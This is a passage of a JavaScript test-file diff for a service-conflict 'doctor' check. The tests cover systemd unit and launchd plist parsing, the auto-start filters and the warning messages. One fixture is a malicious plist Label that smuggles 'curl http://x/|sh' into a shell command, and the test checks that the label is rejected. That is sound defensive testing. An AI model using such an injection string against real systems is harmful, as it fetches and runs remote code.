+// Realistic `systemctl show <units> -p Id -p ExecStart -p Environment -p UnitFileState
+// -p EnvironmentFiles` output, matching the exact field-incident shape from issue #215: system
+// unit ocp.service (bind 0.0.0.0), user unit ocp-proxy.service (bind 127.0.0.1), same working
+// tree, same port. Deliberately WITHOUT UnitFileState/EnvironmentFiles (older systemd, or a
+// caller that didn't request them) — this doubles as the "permissive when absent" baseline
+// every other test in this file that uses these fixtures relies on.
 const FIELD_INCIDENT_USER_SHOW =
   `Id=ocp-proxy.service\n` +
   `ExecStart={ path=/usr/bin/node ; argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; ignore_errors=no }\n` +
@@ -6647,14 +6669,27 @@ test("classifyMultiUnitRisk: two enabled OCP units on DIFFERENT ports → no fal
   const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
   const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=9999`;
   const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: userShow, systemShowOut: systemShow });
-  assert.equal(result.state, "clear", "same tree but different port is not the #215 failure shape");
+  assert.equal(result.state, "clear", "different ports are never a boot race — only one process can ever hold a given port");
 });
 
-test("classifyMultiUnitRisk: two enabled OCP units on the SAME port but DIFFERENT working tree → no false positive", () => {
-  const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
-  const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/other-ocp-install/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+test("MED-7: classifyMultiUnitRisk — two enabled OCP units on the SAME port but DIFFERENT working tree → NOW a WARN (grouping is by port alone)", () => {
+  // Review finding MED-7 on #230: an earlier revision of this check required BOTH port AND
+  // working tree to match before warning, reasoning from the single observed field-incident's
+  // shape rather than the stated requirement (#220: "targets the OCP port"; #215: "points at
+  // the same port" — neither mentions the tree), and did so without flagging the narrowing as
+  // a narrowing. It was wrong on the merits too: two units on the same port from DIFFERENT
+  // trees still race for the port and would serve DIFFERENT CODE to whoever wins — arguably a
+  // worse outcome than the field incident, not a lesser one, and a host in this state has two
+  // entirely separate installs nobody may even realize both auto-start. The working tree is
+  // still surfaced (see the message-enrichment tests below) — it just no longer gates.
+  const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp-A/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+  const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp-B/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
   const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: userShow, systemShowOut: systemShow });
-  assert.equal(result.state, "clear", "same port but a different install directory is not the #215 failure shape");
+  assert.equal(result.state, "warn");
+  assert.equal(result.groups.length, 1);
+  assert.equal(result.groups[0].length, 2);
+  const trees = result.groups[0].map(u => u.workingTree).sort();
+  assert.deepEqual(trees, ["/home/opc/ocp-A", "/home/opc/ocp-B"]);
 });
 
 test("classifyMultiUnitRisk: enabled units that AREN'T OCP (no server.mjs in ExecStart) never count toward a group", () => {
@@ -6684,17 +6719,67 @@ test("classifyMultiUnitRisk: an unvalidated/malformed unit Id is rejected, never
   assert.equal(result.state, "clear", "the malformed Id must be dropped entirely, leaving only one valid unit");
 });
 
+console.log("\nMulti-unit boot-race pre-flight (issue #220) — UnitFileState / EnvironmentFiles defense in depth (HIGH-2, MED-6):");
+
+test("HIGH-2: classifyMultiUnitRisk — a candidate whose UnitFileState is NOT in the auto-start allowlist is excluded, even though ExecStart matches", () => {
+  // Defense in depth: --state=enabled at LISTING time is the primary filter, but a control
+  // mutation (see PR body) proved a future refactor could drop that flag silently while the
+  // whole suite stayed green. This allowlist re-derives "would actually start at boot" from
+  // each unit's OWN config, independent of the listing command.
+  const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456\nUnitFileState=static`;
+  const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456\nUnitFileState=enabled`;
+  const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: userShow, systemShowOut: systemShow });
+  assert.equal(result.state, "clear", "UnitFileState=static must be excluded, leaving only one valid (enabled) candidate");
+});
+
+test("HIGH-2: classifyMultiUnitRisk — UnitFileState=enabled-runtime is an allowlisted positive (a valid 'would start' state)", () => {
+  const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456\nUnitFileState=enabled-runtime`;
+  const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456\nUnitFileState=enabled`;
+  const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: userShow, systemShowOut: systemShow });
+  assert.equal(result.state, "warn", "enabled-runtime must count, not just enabled");
+});
+
+test("HIGH-2: classifyMultiUnitRisk — UnitFileState ABSENT stays permissive (does not newly reject shapes the primary filter already handled)", () => {
+  const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+  const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+  const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: userShow, systemShowOut: systemShow });
+  assert.equal(result.state, "warn", "absent UnitFileState (older systemd, or a caller that didn't request it) must not be treated as a rejection");
+});
+
+test("MED-6: classifyMultiUnitRisk — a candidate with a non-empty EnvironmentFiles is excluded (its real port cannot be trusted)", () => {
+  // `systemctl show -p Environment` reflects only literal Environment= directives, never
+  // EnvironmentFile= expansion. Assuming DEFAULT_PORT for a unit that might set its port via a
+  // file we cannot read would fabricate a port match (or mismatch) with no real evidence.
+  const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456\nEnvironmentFiles=/etc/ocp.env (ignore_errors=no)`;
+  const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+  const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: userShow, systemShowOut: systemShow });
+  assert.equal(result.state, "clear", "the EnvironmentFiles-configured candidate must be dropped, leaving only one valid candidate");
+});
+
+test("MED-6: classifyMultiUnitRisk — an EMPTY EnvironmentFiles value stays permissive (no file actually configured)", () => {
+  const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456\nEnvironmentFiles=`;
+  const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+  const result = classifyMultiUnitRisk({ platform: "linux", userShowOut: userShow, systemShowOut: systemShow });
+  assert.equal(result.state, "warn", "an empty EnvironmentFiles property means none is actually configured — must not be treated as 'untrustworthy'");
+});
+
 console.log("\nMulti-unit boot-race pre-flight (issue #220) — macOS (launchd):");
 
 function plistBlob(files) {
   return files.map(([path, content]) => `===OCP-DOCTOR-FILE:${path}===\n${content}`).join("\n");
 }
-function ocpPlist({ label, port, bind }) {
-  return `<key>RunAtLoad</key><true/>` +
-    `<key>Label</key><string>${label}</string>` +
-    `<key>ProgramArguments</key><array><string>/usr/bin/node</string><string>/Users/opc/ocp/server.mjs</string></array>` +
+// runAtLoad: true (default) | false (explicit <false/>) | null (key omitted entirely)
+function ocpPlist({ label, port, bind, runAtLoad = true, serverPath = "/Users/opc/ocp/server.mjs" }) {
+  const runAtLoadXml = runAtLoad === null ? "" : `<key>RunAtLoad</key><${runAtLoad ? "true" : "false"}/>`;
+  return runAtLoadXml +
+    (label != null ? `<key>Label</key><string>${label}</string>` : "") +
+    `<key>ProgramArguments</key><array><string>/usr/bin/node</string><string>${serverPath}</string></array>` +
     (port ? `<key>CLAUDE_PROXY_PORT</key><string>${port}</string>` : "") +
     (bind ? `<key>CLAUDE_BIND</key><string>${bind}</string>` : "");
+}
+function disabledLaunchctlBlob(entries) {
+  const lines = entries.map(([label, disabled]) => `\t"${label}" => ${disabled ? "disabled" : "enabled"}`).join("\n");
+  return `disabled services = {\n${lines}\n}`;
 }
 
 test("classifyMultiUnitRisk (macOS): two enabled plists, same tree+port → WARN — the launchd analogue of the field incident", () => {
@@ -6706,7 +6791,24 @@ test("classifyMultiUnitRisk (macOS): two enabled plists, same tree+port → WARN
   assert.equal(result.state, "warn");
   assert.equal(result.groups[0].length, 2);
   const scopes = result.groups[0].map(u => u.scope).sort();
-  assert.deepEqual(scopes, ["system", "user"], "LaunchDaemons path classifies as system scope, LaunchAgents as user");
+  assert.deepEqual(scopes, ["system", "user"], "LaunchDaemons classifies as system scope, personal LaunchAgents as user");
+});
+
+test("MED-4: classifyMultiUnitRisk (macOS) — /Library/LaunchAgents (system-wide installer location) is scanned and classified as system scope", () => {
+  // The bug found on review: an earlier revision only scanned ~/Library/LaunchAgents and
+  // /Library/LaunchDaemons — the two locations LEAST likely to be populated on an ordinary Mac
+  // (Apple's own daemons live under /System/Library, so /Library/LaunchDaemons is normally
+  // empty) — and never scanned /Library/LaunchAgents at all, which is exactly where a package
+  // installer drops a system-wide agent (the case this feature is supposed to catch).
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456", bind: "127.0.0.1" })],
+    ["/Library/LaunchAgents/com.installer.ocpwatch.plist", ocpPlist({ label: "com.installer.ocpwatch", port: "3456", bind: "0.0.0.0" })],
+  ]);
+  const result = classifyMultiUnitRisk({ platform: "darwin", plistBlob: blob });
+  assert.equal(result.state, "warn", "/Library/LaunchAgents must be scanned, not silently skipped");
+  const byName = Object.fromEntries(result.groups[0].map(u => [u.name, u]));
+  assert.equal(byName["com.installer.ocpwatch"].scope, "system", "/Library/LaunchAgents is system-wide, distinct from the personal ~/Library/LaunchAgents");
+  assert.equal(byName["com.installer.ocpwatch"].domain, "gui", "still a LaunchAgent — disable domain is gui/<uid>, NOT the system daemon domain");
 });
 
 test("classifyMultiUnitRisk (macOS): only the standard single OCP LaunchAgent present → clear (the common case)", () => {
@@ -6724,23 +6826,77 @@ test("classifyMultiUnitRisk (macOS): plist enumeration unavailable/unreadable (n
   assert.equal(classifyMultiUnitRisk({ platform: "darwin", plistBlob: null }).state, "unknown");
 });
 
-test("classifyMultiUnitRisk (macOS): a plist without RunAtLoad=true never counts (wouldn't actually auto-start)", () => {
-  const disabledPlist = `<key>Label</key><string>dev.ocp.proxy</string>` +
-    `<key>ProgramArguments</key><array><string>/usr/bin/node</string><string>/Users/opc/ocp/server.mjs</string></array>`;
+test("classifyMultiUnitRisk (macOS): a plist with NO RunAtLoad key at all never counts (wouldn't actually auto-start)", () => {
   const blob = plistBlob([
     ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456" })],
-    ["/Library/LaunchDaemons/stopped.plist", disabledPlist],
+    ["/Library/LaunchDaemons/stopped.plist", ocpPlist({ label: "stopped", port: "3456", runAtLoad: null })],
   ]);
   assert.equal(classifyMultiUnitRisk({ platform: "darwin", plistBlob: blob }).state, "clear");
 });
 
-console.log("\nMulti-unit boot-race pre-flight (issue #220) — gatherUnitCandidates (impure layer, PR #221 MED-6 lesson):");
+test("classifyMultiUnitRisk (macOS): a plist with EXPLICIT <key>RunAtLoad</key><false/> never counts either", () => {
+  // LOW item from review: the previous suite only covered the key being ABSENT, not an
+  // explicit false — a plausible real shape (an operator or installer disabling auto-start
+  // without removing the key).
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456" })],
+    ["/Library/LaunchDaemons/stopped.plist", ocpPlist({ label: "stopped", port: "3456", runAtLoad: false })],
+  ]);
+  assert.equal(classifyMultiUnitRisk({ platform: "darwin", plistBlob: blob }).state, "clear");
+});
 
-// PR #221's independent review (MED-6) found the IMPURE gathering layer had zero coverage and
-// that's exactly where the real defects lived (a platform-branch swap and a null-handling bug
-// both survived mutation undetected in that PR's first draft). These tests drive
-// gatherUnitCandidates directly with a fake `run` that pattern-matches on command strings —
-// the same lesson applied here before it could repeat.
+test("MED-3: classifyMultiUnitRisk (macOS) — a maliciously-crafted <Label> is rejected, never trusted into a group or a message", () => {
+  // Same trust-boundary class as the Linux Id check and PR #221's MED-5 finding: a <Label> is
+  // attacker-creatable by anyone who can drop a plist. Review finding MED-3 on #230 found an
+  // earlier revision interpolated an unvalidated Label straight into a copy-pasteable shell
+  // command in the WARN message.
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456" })],
+    ["/Library/LaunchDaemons/evil.plist", ocpPlist({ label: 'evil"; curl http://x/|sh #', port: "3456" })],
+  ]);
+  const result = classifyMultiUnitRisk({ platform: "darwin", plistBlob: blob });
+  assert.equal(result.state, "clear", "the malformed Label must be dropped entirely, leaving only one valid unit");
+});
+
+test("classifyMultiUnitRisk (macOS): default port when CLAUDE_PROXY_PORT key is absent from the plist", () => {
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy" })],
+    ["/Library/LaunchDaemons/other.plist", ocpPlist({ label: "other" })],
+  ]);
+  const result = classifyMultiUnitRisk({ platform: "darwin", plistBlob: blob });
+  assert.equal(result.state, "warn");
+  assert.ok(result.groups[0].every(u => u.port === "3456"), "absent CLAUDE_PROXY_PORT must default to DEFAULT_PORT on macOS too");
+});
+
+console.log("\nMulti-unit boot-race pre-flight (issue #220) — launchctl print-disabled cross-check (false-claim fix):");
+
+test("classifyMultiUnitRisk (macOS): a persistently-disabled (launchctl disable) unit is excluded — it would never actually start", () => {
+  // Verified against a real host: `launchctl print-disabled gui/<uid>` produces a
+  // `disabled services = { "<label>" => enabled|disabled ... }` block. A RunAtLoad=true plist
+  // that's been `launchctl disable`d is inert — warning about it would be a false positive,
+  // and `launchctl disable` is the persistent remediation a Mac operator would actually use.
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456" })],
+    ["/Library/LaunchDaemons/ai.custom.ocp.plist", ocpPlist({ label: "ai.custom.ocp", port: "3456" })],
+  ]);
+  const disabledBlob = disabledLaunchctlBlob([["dev.ocp.proxy", false], ["ai.custom.ocp", true]]);
+  const result = classifyMultiUnitRisk({ platform: "darwin", plistBlob: blob, disabledBlob });
+  assert.equal(result.state, "clear", "ai.custom.ocp is persistently disabled — only one live candidate remains");
+});
+
+test("classifyMultiUnitRisk (macOS): disabledBlob unavailable (null) is PERMISSIVE — degrades to 'nothing filtered', not 'unknown'", () => {
+  // RunAtLoad=true is already a sufficient positive signal on its own; the disabled-overrides
+  // cross-check is a refinement, not a requirement — its own absence must not escalate the
+  // whole check to "can't tell" when the primary plist enumeration succeeded fine.
+  const blob = plistBlob([
+    ["/Users/opc/Library/LaunchAgents/dev.ocp.proxy.plist", ocpPlist({ label: "dev.ocp.proxy", port: "3456" })],
+    ["/Library/LaunchDaemons/ai.custom.ocp.plist", ocpPlist({ label: "ai.custom.ocp", port: "3456" })],
+  ]);
+  const result = classifyMultiUnitRisk({ platform: "darwin", plistBlob: blob, disabledBlob: null });
+  assert.equal(result.state, "warn", "a missing disabledBlob must not suppress an otherwise-real conflict");
+});
+
+console.log("\nMulti-unit boot-race pre-flight (issue #220) — gatherUnitCandidates (impure layer):");
 
 test("gatherUnitCandidates: listing fails (run throws) → showOut is null, not \"\" — never silently treated as zero enabled units", () => {
   const run = (cmd) => { throw new Error(`systemctl: command not found`); };
@@ -6773,45 +6929,108 @@ test("gatherUnitCandidates: listing succeeds with candidates, but the show call 
   assert.equal(raw.systemShowOut, null);
 });
 
-test("gatherUnitCandidates: batches ALL candidates into ONE show call per scope — never one spawn per unit", () => {
-  let userShowCalls = 0, systemShowCalls = 0;
+test("HIGH-1/HIGH-2: gatherUnitCandidates batches ALL candidates into ONE show call per scope, and both listing commands request --state=enabled", () => {
+  const capturedCmds = [];
   const run = (cmd) => {
+    capturedCmds.push(cmd);
     if (cmd.includes("--user list-unit-files")) return "a.service enabled\nb.service enabled\nc.service enabled\n";
     if (cmd.includes("list-unit-files")) return "d.service enabled\ne.service enabled\n";
-    if (cmd.includes("--user show")) {
-      userShowCalls++;
-      assert.ok(cmd.includes("a.service") && cmd.includes("b.service") && cmd.includes("c.service"),
-        "all three user-scope candidates must appear in the SAME show command");
-      return "Id=a.service\nExecStart={ argv[]=/bin/true ; }\nEnvironment=";
-    }
-    if (cmd.includes("systemctl show")) {
-      systemShowCalls++;
-      return "Id=d.service\nExecStart={ argv[]=/bin/true ; }\nEnvironment=";
-    }
+    if (cmd.includes("--user show")) return "Id=a.service\nExecStart={ argv[]=/bin/true ; }\nEnvironment=";
+    if (cmd.includes("systemctl show")) return "Id=d.service\nExecStart={ argv[]=/bin/true ; }\nEnvironment=";
     throw new Error("unexpected: " + cmd);
   };
   gatherUnitCandidates(run, "linux");
-  assert.equal(userShowCalls, 1, "exactly one batched show call for the user scope");
-  assert.equal(systemShowCalls, 1, "exactly one batched show call for the system scope");
+
+  // HIGH-1: all assertions below run AFTER gatherUnitCandidates returns, on CAPTURED command
+  // strings — never from inside the `run` fake itself, where a thrown AssertionError would be
+  // swallowed by gatherUnitCandidates' own try/catch before reaching the test framework (see
+  // the module header comment and the PR body's mutation table for the deliberately-false
+  // assertion that proved the old version of this test could never fail).
+  const userListingCmds = capturedCmds.filter(c => c.includes("--user list-unit-files"));
+  const systemListingCmds = capturedCmds.filter(c => c.includes("list-unit-files") && !c.includes("--user"));
+  const userShowCmds = capturedCmds.filter(c => c.includes("--user show"));
+  const systemShowCmds = capturedCmds.filter(c => c.includes("systemctl show") && !c.includes("--user"));
+
+  assert.equal(userShowCmds.length, 1, "exactly one batched show call for the user scope");
+  assert.equal(systemShowCmds.length, 1, "exactly one batched show call for the system scope");
+  assert.ok(userShowCmds[0].includes("a.service") && userShowCmds[0].includes("b.service") && userShowCmds[0].includes("c.service"),
+    "all three user-scope candidates must appear in the SAME show command");
+
+  // HIGH-2: the entire "only ENABLED units are candidates" precondition rests on this literal
+  // flag being present in BOTH listing commands. A control mutation deleting it survived the
+  // whole suite untouched (see PR body) because nothing had ever asserted on the command
+  // string itself.
+  assert.equal(userListingCmds.length, 1);
+  assert.equal(systemListingCmds.length, 1);
+  assert.ok(userListingCmds[0].includes("--state=enabled"), "user-scope listing must request --state=enabled");
+  assert.ok(systemListingCmds[0].includes("--state=enabled"), "system-scope listing must request --state=enabled");
 });
 
-test("gatherUnitCandidates (macOS): a single shell command enumerates both LaunchAgents and LaunchDaemons", () => {
-  let calls = 0;
-  const run = (cmd) => {
-    calls++;
-    assert.ok(cmd.includes("LaunchAgents") && cmd.includes("LaunchDaemons"), "both dirs scanned in one command");
-    return "";
-  };
+test("HIGH-1: gatherUnitCandidates (macOS) — a single shell command enumerates LaunchAgents (both dirs) and LaunchDaemons", () => {
+  const capturedCmds = [];
+  const run = (cmd) => { capturedCmds.push(cmd); return ""; };
   gatherUnitCandidates(run, "darwin");
-  assert.equal(calls, 1, "macOS enumeration costs exactly one subprocess spawn");
+  const plistCmds = capturedCmds.filter(c => c.includes("for f in"));
+  assert.equal(plistCmds.length, 1, "macOS plist enumeration costs exactly one subprocess spawn");
+  assert.ok(plistCmds[0].includes('"$HOME/Library/LaunchAgents"'), "must scan the personal LaunchAgents dir");
+  // MED-4: must ALSO scan /Library/LaunchAgents (a package installer's standard system-wide
+  // agent location) — an earlier revision omitted this, scanning only the two directories
+  // least likely to be populated on an ordinary Mac. NOTE: this must be a SPACE-anchored check
+  // (" /Library/LaunchAgents/"), not a bare substring — a plain `.includes("/Library/
+  // LaunchAgents")` is a VACUOUS pass here, because that exact substring already occurs inside
+  // `"$HOME/Library/LaunchAgents"` above; removing the standalone system-wide glob entirely
+  // from the generated command still satisfies a bare substring check. Caught by mutation
+  // during review of this PR — see the PR body's mutation table.
+  assert.ok(plistCmds[0].includes(" /Library/LaunchAgents/"), "must scan the STANDALONE /Library/LaunchAgents (system-wide installer location), not just the $HOME-prefixed personal one");
+  assert.ok(plistCmds[0].includes("/Library/LaunchDaemons"), "must scan /Library/LaunchDaemons");
 });
 
-test("gatherUnitCandidates: past MAX_UNIT_CANDIDATES enabled units in one scope, skip `show` and degrade to unknown rather than an oversized command line", () => {
-  // Cost safety cap (see MAX_UNIT_CANDIDATES in scripts/doctor.mjs): a host with 200+ enabled
-  // *.service units is not a realistic "two OCP installs" shape this check needs to chase —
-  // degrade that SCOPE to null (unknown) instead of building an unbounded `systemctl show`
-  // command line. This must not crash, and must not silently treat the capped scope as "zero
-  // enabled units" (a false all-clear).
+test("gatherUnitCandidates (macOS): also issues a launchctl print-disabled read to cross-check persistent disables", () => {
+  const capturedCmds = [];
+  const run = (cmd) => { capturedCmds.push(cmd); return ""; };
+  gatherUnitCandidates(run, "darwin");
+  const disabledCmds = capturedCmds.filter(c => c.includes("print-disabled"));
+  assert.equal(disabledCmds.length, 1, "exactly one print-disabled read");
+  assert.ok(disabledCmds[0].includes("gui/"), "must query the gui/<uid> domain (covers every LaunchAgent, personal or system-wide)");
+});
+
+test("MED-4 (real shell, verified mechanism): a non-matching TRAILING glob makes a bare for-loop throw and discard earlier real output — the trailing no-op fixes it", () => {
+  // The actual bug found on review, reproduced here with a REAL subprocess against a real
+  // scratch directory (not a mocked command string): `for f in <dir>/*.plist; do [ -f "$f" ]
+  // && ...; done` — when the LAST glob in the list expands to nothing, the shell leaves it as
+  // a literal unmatched pattern, `[ -f "<literal>" ]` is false, and that false test's exit code
+  // becomes the WHOLE for-loop's exit code. execSync throws on that non-zero exit and DISCARDS
+  // whatever stdout an EARLIER, successful iteration already produced. On an ordinary Mac this
+  // is the COMMON case, not an edge case: /Library/LaunchDaemons is normally empty (Apple's own
+  // daemons live under /System/Library).
+  const scratch = mkdtempSync(join(tmpdir(), "ocp-doctor-mac-glob-test-"));
+  try {
+    writeFileSync(join(scratch, "one.plist"), "marker-content");
+    const bareCmd = `for f in "${scratch}"/*.plist "${scratch}/nonexistent-subdir-xyz"/*.plist; do [ -f "$f" ] && cat "$f"; done`;
+
+    let threwOnBare = false;
+    try { execFileSync("sh", ["-c", bareCmd]); } catch { threwOnBare = true; }
+    assert.equal(threwOnBare, true,
+      "control: without a trailing no-op, a non-matching TRAILING glob makes the whole command fail — discarding the real, earlier match");
+
+    const fixedCmd = bareCmd + "; :";
+    const out = execFileSync("sh", ["-c", fixedCmd]).toString();
+    assert.ok(out.includes("marker-content"), "with the trailing `; :`, the earlier successful match's real output survives");
+  } finally {
+    rmSync(scratch, { recursive: true, force: true });
+  }
+});
+
+test("MED-4: the actual darwin plist-enumeration command generated by gatherUnitCandidates ends with the no-op terminator", () => {
+  let capturedCmd;
+  const run = (cmd) => { if (cmd.includes("for f in")) capturedCmd = cmd; return ""; };
+  gatherUnitCandidates(run, "darwin");
+  assert.ok(capturedCmd, "expected a 'for f in' plist-enumeration command to be issued");
+  assert.ok(/;\s*:\s*$/.test(capturedCmd),
+    `command must end with a no-op (e.g. "; :") so a non-matching trailing glob's exit code can never propagate; got: ${capturedCmd}`);
+});
+
+test("gatherUnitCandidates: past MAX_UNIT_CANDIDATES (200) enabled units in one scope, skip `show` and degrade to unknown rather than an oversized command line", () => {
   const manyNames = Array.from({ length: 201 }, (_, i) => `unit-${i}.service`).join(" enabled\n") + " enabled\n";
   let showCalled = false;
   const run = (cmd) => {
@@ -6823,6 +7042,37 @@ test("gatherUnitCandidates: past MAX_UNIT_CANDIDATES enabled units in one scope,
   const raw = gatherUnitCandidates(run, "linux");
   assert.equal(showCalled, false, "must not attempt an oversized batched show call");
   assert.equal(raw.userShowOut, null, "capped scope must degrade to unknown (null), never '' (false all-clear)");
+  assert.equal(classifyMultiUnitRisk(raw).state, "unknown");
+});
+
+test("gatherUnitCandidates: EXACTLY at the MAX_UNIT_CANDIDATES boundary (200) is NOT capped — only strictly MORE than 200 is", () => {
+  const exactlyAtCap = Array.from({ length: 200 }, (_, i) => `unit-${i}.service`).join(" enabled\n") + " enabled\n";
+  let showCalled = false;
+  const run = (cmd) => {
+    if (cmd.includes("--user list-unit-files")) return exactlyAtCap;
+    if (cmd.includes("list-unit-files")) return "";
+    if (cmd.includes("show")) { showCalled = true; return "Id=unit-0.service\nExecStart={ argv[]=/bin/true ; }\nEnvironment="; }
+    throw new Error("unexpected: " + cmd);
+  };
+  const raw = gatherUnitCandidates(run, "linux");
+  assert.equal(showCalled, true, "exactly 200 candidates must still be probed — the cap is > 200, not >= 200");
+  assert.notEqual(raw.userShowOut, null);
+});
+
+test("gatherUnitCandidates: the MAX_UNIT_CANDIDATES cap applies to the SYSTEM scope too, independent of the user scope", () => {
+  // The earlier suite only exercised the cap on the user scope — a symmetric bug on the system
+  // scope (e.g. only checking userNames.length) would have gone uncaught.
+  const manyNames = Array.from({ length: 201 }, (_, i) => `sys-unit-${i}.service`).join(" enabled\n") + " enabled\n";
+  let systemShowCalled = false;
+  const run = (cmd) => {
+    if (cmd.includes("--user list-unit-files")) return ""; // user scope: nothing enabled
+    if (cmd.includes("list-unit-files")) return manyNames;
+    if (cmd.includes("show")) { systemShowCalled = true; return "should not be reached"; }
+    throw new Error("unexpected: " + cmd);
+  };
+  const raw = gatherUnitCandidates(run, "linux");
+  assert.equal(systemShowCalled, false, "must not attempt an oversized batched show call for the system scope either");
+  assert.equal(raw.systemShowOut, null);
   assert.equal(classifyMultiUnitRisk(raw).state, "unknown");
 });
 
@@ -6850,10 +7100,35 @@ test("runDoctor: two conflicting enabled units → pushes an actionable multi_un
     "message must name BOTH units");
   assert.ok(check.message.includes("127.0.0.1") && check.message.includes("0.0.0.0"),
     "message must name the bind-address difference — the actual LAN-reachability hazard");
+  assert.ok(check.message.includes("same working tree"), "message must note the units share a working tree");
   assert.ok(check.message.includes("disable"), "message must say what to do (disable the stray unit)");
   // WARN must not flip ready_to_upgrade to false — runUpgrade()'s pre-flight guard
   // (scripts/upgrade.mjs) only tolerates ready_to_upgrade=false for kind="fresh_install".
   assert.equal(result.ready_to_upgrade, true);
+});
+
+test("MED-7: runDoctor — same port, DIFFERENT working tree → NOW a WARN, message names both trees and calls out the difference", async () => {
+  const userShow = `Id=a.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp-A/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+  const systemShow = `Id=b.service\nExecStart={ argv[]=/usr/bin/node /home/opc/ocp-B/server.mjs ; }\nEnvironment=CLAUDE_PROXY_PORT=3456`;
+  const result = await runDoctor({
+    skipNetwork: false,
+    mockVersion: "v3.26.0",
+    mockLatest: "v3.26.0",
+    mockHealth: { status: 200, body: { version: "3.26.0", auth: { ok: true } } },
+    mockPlatform: "linux",
+    run: (cmd) => {
+      if (cmd.includes("--user list-unit-files")) return "a.service enabled\n";
+      if (cmd.includes("list-unit-files")) return "b.service enabled\n";
+      if (cmd.includes("--user show")) return userShow;
+      if (cmd.includes("systemctl show")) return systemShow;
+      throw new Error("unexpected: " + cmd);
+    },
+  });
+  const check = result.checks.find(c => c.id === "multi_unit_boot_race");
+  assert.ok(check, "two units on the same port from different trees must still warn — they race for the port and would serve DIFFERENT code to whoever wins");
+  assert.equal(check.level, "WARN");
+  assert.ok(check.message.includes("DIFFERENT working trees"), "message must call out that the trees differ");
+  assert.ok(check.message.includes("ocp-A") && check.message.includes("ocp-B"), "message must name both trees");
 });
 
 test("runDoctor: exactly one enabled OCP unit → no multi_unit_boot_race check pushed", async () => {
@@ -6889,7 +7164,12 @@ test("runDoctor: zero enabled units on either scope → no check pushed, no cras
   assert.equal(result.ready_to_upgrade, true);
 });
 
-test("runDoctor: systemctl missing entirely (every call throws) → degrades honestly, no check pushed, no crash", async () => {
+test("MED-5: runDoctor — systemctl missing entirely (every call throws) → pushes a visible INFO line, distinguishable from a verified-clear host", async () => {
+  // Before this fix, "unknown" pushed nothing at all — indistinguishable from a genuinely
+  // clear host in the JSON output. That matters because `systemctl --user ...` fails without
+  // XDG_RUNTIME_DIR/DBUS_SESSION_BUS_ADDRESS, which is exactly what `sudo`'s env_reset strips —
+  // so `sudo ocp update` on a host whose OCP is a SYSTEM unit (the #215 shape) silently
+  // degraded this whole check with no visible trace.
   const result = await runDoctor({
     skipNetwork: false,
     mockVersion: "v3.26.0",
@@ -6898,15 +7178,18 @@ test("runDoctor: systemctl missing entirely (every call throws) → degrades hon
     mockPlatform: "linux",
     run: (cmd) => { throw new Error("systemctl: command not found"); },
   });
-  assert.ok(!result.checks.some(c => c.id === "multi_unit_boot_race"),
-    "a missing systemctl must degrade to 'can't tell', never a false all-clear that fabricates a WARN or a crash that aborts doctor entirely");
+  const check = result.checks.find(c => c.id === "multi_unit_boot_race");
